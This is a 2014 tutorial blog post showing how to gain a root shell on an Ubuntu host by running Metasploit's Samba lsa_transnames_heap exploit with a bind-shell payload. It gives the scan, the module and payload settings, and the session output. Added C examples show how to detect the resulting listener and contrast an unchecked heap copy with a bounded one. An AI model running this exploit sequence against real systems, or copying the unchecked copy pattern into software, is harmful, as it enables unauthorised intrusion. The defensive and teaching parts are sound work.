Sunday, 6 April 2014

How to Exploit an Ubuntu Machine!

In my previous tutorial, I explained how to exploit a Windows machine. Here we will exploit an Ubuntu machine.

The steps are pretty much the same as for the preceding exploit, except that we will select a different payload.


msf > nmap -sT -A -P0 192.168.1.3


Assume the scan shows three open ports, 80, 139 and 445, with the host running a version of Samba 3.x and Apache 2.2.3 with PHP 5.2.1.


Let's search for a Samba exploit:

msf > search samba
[*] Searching loaded modules for pattern 'samba'...

Auxiliary
=========

   Name                               Rank    Description
   ----                               ----    -----------
   admin/smb/samba_symlink_traversal  normal  Samba Symlink Directory Traversal
   dos/samba/lsa_addprivs_heap        normal  Samba lsa_io_privilege_set Heap Overflow
   dos/samba/lsa_transnames_heap      normal  Samba lsa_io_trans_names Heap Overflow

Exploits
========

   Name                               Rank    Description
   ----                               ----    -----------
   linux/samba/lsa_transnames_heap    good    Samba lsa_io_trans_names . . .
   . . . SNIP . . .

msf > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > show payloads

Compatible Payloads
===================

   Name                            Rank    Description
   ----                            ----    -----------
   generic/debug_trap              normal  Generic x86 Debug Trap
   generic/shell_bind_tcp          normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp       normal  Generic Command Shell, Reverse TCP Inline
   linux/x86/adduser               normal  Linux Add User
   linux/x86/chmod                 normal  Linux Chmod
   linux/x86/exec                  normal  Linux Execute Command
   linux/x86/metsvc_bind_tcp       normal  Linux Meterpreter Service, Bind TCP
   linux/x86/metsvc_reverse_tcp    normal  Linux Meterpreter Service, Reverse TCP Inline
   linux/x86/shell/bind_ipv6_tcp   normal  Linux Command Shell, Bind TCP Stager (IPv6)
   linux/x86/shell/bind_tcp        normal  Linux Command Shell, Bind TCP Stager
   . . . SNIP . . .

msf exploit(lsa_transnames_heap) > set payload linux/x86/shell_bind_tcp
payload => linux/x86/shell_bind_tcp
msf exploit(lsa_transnames_heap) > set LPORT 8080
LPORT => 8080
msf exploit(lsa_transnames_heap) > set RHOST 192.168.1.2
RHOST => 192.168.1.2
msf exploit(lsa_transnames_heap) > exploit
[*] Creating nop sled....
[*] Started bind handler
[*] Trying to exploit Samba with address 0xffff104e...
[*] Connecting to the SMB service...
. . . SNIP . . .
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 1 opened (192.168.1.3:41551 -> 192.168.1.2:8080)

whoami
root
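From the defender's side, the bind-TCP payload used above has a visible footprint: the shell runs inside the exploited smbd process, so the host ends up with a listener on LPORT (8080 here) owned by smbd rather than on the usual 139/445. The following is an added example, not code from the original post or from Samba or Metasploit, that checks `ss -ltnp` style output against a per-daemon port baseline. The sample lines, the baseline table and the function names are all constructed for this illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed sample of `ss -ltnp` output (not captured from a real host):
   the two legitimate smbd listeners, the Apache listener, and one extra
   listener on 8080 owned by an smbd child, which is what an in-process
   bind-shell payload with LPORT 8080 would look like. */
static const char *SAMPLE_SS[] = {
    "State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process",
    "LISTEN 0      50     0.0.0.0:445        0.0.0.0:*         users:((\"smbd\",pid=812,fd=35))",
    "LISTEN 0      50     0.0.0.0:139        0.0.0.0:*         users:((\"smbd\",pid=812,fd=36))",
    "LISTEN 0      128    0.0.0.0:80         0.0.0.0:*         users:((\"apache2\",pid=700,fd=4))",
    "LISTEN 0      1      0.0.0.0:8080       0.0.0.0:*         users:((\"smbd\",pid=1044,fd=21))",
    NULL
};

/* Hypothetical baseline: the ports each daemon is allowed to listen on. */
struct baseline { const char *proc; int ports[4]; };
static const struct baseline BASELINE[] = {
    { "smbd",    {139, 445, 0} },
    { "apache2", {80, 0} },
    { NULL,      {0} }
};

/* Parse one ss line into (port, process name). Returns 0 on success,
   -1 for the header line or anything that is not a LISTEN entry. */
int parse_ss_line(const char *line, int *port, char *proc, size_t proclen)
{
    char state[16], recvq[16], sendq[16], local[64];
    if (sscanf(line, "%15s %15s %15s %63s", state, recvq, sendq, local) != 4)
        return -1;
    if (strcmp(state, "LISTEN") != 0)
        return -1;
    const char *colon = strrchr(local, ':');          /* port follows last ':' */
    if (!colon) return -1;
    *port = atoi(colon + 1);
    const char *p = strstr(line, "users:((\"");        /* process name in users:(("name",... */
    if (!p) return -1;
    p += strlen("users:((\"");
    const char *q = strchr(p, '"');
    if (!q || (size_t)(q - p) >= proclen) return -1;
    memcpy(proc, p, (size_t)(q - p));
    proc[q - p] = '\0';
    return 0;
}

/* Convenience for checks: port of a LISTEN line, or -1 if it does not parse. */
int listen_port(const char *line)
{
    int port; char proc[32];
    return parse_ss_line(line, &port, proc, sizeof proc) == 0 ? port : -1;
}

/* 1 if the (proc, port) pair is in the baseline, 0 otherwise.
   Processes not in the baseline at all are treated as not allowed (fail closed). */
int listener_allowed(const char *proc, int port)
{
    for (const struct baseline *b = BASELINE; b->proc; b++) {
        if (strcmp(b->proc, proc) != 0) continue;
        for (int i = 0; b->ports[i]; i++)
            if (b->ports[i] == port) return 1;
        return 0;
    }
    return 0;
}

/* Walk the lines, report every listener outside the baseline, return the count. */
int count_unexpected_listeners(const char *const *lines)
{
    int found = 0;
    for (; *lines; lines++) {
        int port; char proc[32];
        if (parse_ss_line(*lines, &port, proc, sizeof proc) != 0) continue;
        if (!listener_allowed(proc, port)) {
            printf("ALERT: %s listening on port %d is not in the baseline\n", proc, port);
            found++;
        }
    }
    return found;
}

int main(void)
{
    /* Exit non-zero when something unexpected is listening, for use from cron. */
    return count_unexpected_listeners(SAMPLE_SS) ? 1 : 0;
}
```

On the sample above the check flags only the smbd listener on 8080. A real deployment would feed it live `ss -ltnp` output and keep the baseline in a file; the point is that an inline bind shell does not hide from socket inventory, because the socket belongs to the daemon that was exploited.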

This type of exploit, called a heap-based attack, takes advantage of dynamic memory allocation: the buffer being overflowed lives on the heap rather than the stack, so the overwrite corrupts neighbouring heap data and allocator bookkeeping instead of a saved return address.
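To make the bug class concrete, here is an added example (not Samba's code, and not taken from the original post) of the shape of a heap overflow and of the bounded version that closes it. A record with a fixed number of slots is allocated on the heap, and a count taken from a client message is used as the copy length; the unchecked variant writes past the end of the allocation when the count is larger than the record, while the checked variant rejects the message before anything is written. `NAME_SLOTS`, `struct name_table`, `struct message` and all function names are hypothetical, and the two messages are constructed for the illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#define NAME_SLOTS 8   /* hypothetical fixed capacity of the heap record */

/* A record allocated on the heap with a fixed number of 4-byte slots.
   On a real heap it is followed by allocator metadata and other objects,
   which is what an overflow here would corrupt. */
struct name_table {
    uint32_t count;
    uint32_t slots[NAME_SLOTS];
};

/* Simulated client message: a count header followed by a payload. */
struct message { uint32_t count; uint32_t data[32]; };

/* Constructed inputs: a well-formed message and one whose count exceeds the
   record capacity (and the payload it actually carries). */
static const struct message GOOD_MSG     = { 3,    {10, 20, 30} };
static const struct message OVERSIZED_MSG = { 1000, {0} };

/* Vulnerable shape, shown for contrast and never called with untrusted input:
   `count` comes straight from the client and is used as the copy length without
   being checked against NAME_SLOTS, so a large count writes past the allocation. */
int fill_table_unchecked(struct name_table *t, const uint32_t *src, uint32_t count)
{
    t->count = count;
    memcpy(t->slots, src, (size_t)count * sizeof(uint32_t)); /* overflow if count > NAME_SLOTS */
    return 0;
}

/* Bounded version: validate the client-supplied count before it becomes a
   length. Returns 0 on success, -1 on oversized input with nothing written. */
int fill_table_checked(struct name_table *t, const uint32_t *src, uint32_t count)
{
    if (count > NAME_SLOTS)
        return -1;
    t->count = count;
    memcpy(t->slots, src, (size_t)count * sizeof(uint32_t));
    return 0;
}

/* Message handler using the bounded copy: 0 if the message was accepted,
   -1 if it was rejected (or allocation failed). */
int handle_message(const struct message *m)
{
    struct name_table *t = calloc(1, sizeof *t);
    if (!t) return -1;
    int rc = fill_table_checked(t, m->data, m->count);
    free(t);
    return rc;
}

/* Slot value read back after a successful checked fill, or -1 on rejection;
   lets a caller confirm that accepted data really landed in the record. */
int slot_after_fill(const struct message *m, unsigned idx)
{
    struct name_table t;
    if (idx >= NAME_SLOTS || fill_table_checked(&t, m->data, m->count) != 0)
        return -1;
    return (int)t.slots[idx];
}

int main(void)
{
    printf("good message:      %s\n", handle_message(&GOOD_MSG) == 0 ? "accepted" : "rejected");
    printf("oversized message: %s\n", handle_message(&OVERSIZED_MSG) == 0 ? "accepted" : "rejected");
    return 0;
}
```

With the unchecked variant, a count of 1000 would copy 4000 bytes into a 36-byte allocation; the checked variant turns the same message into a clean protocol error, which is the fix pattern behind most heap overflow patches: every length that crosses a trust boundary is compared with the capacity of the buffer it will be written into before it is used.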
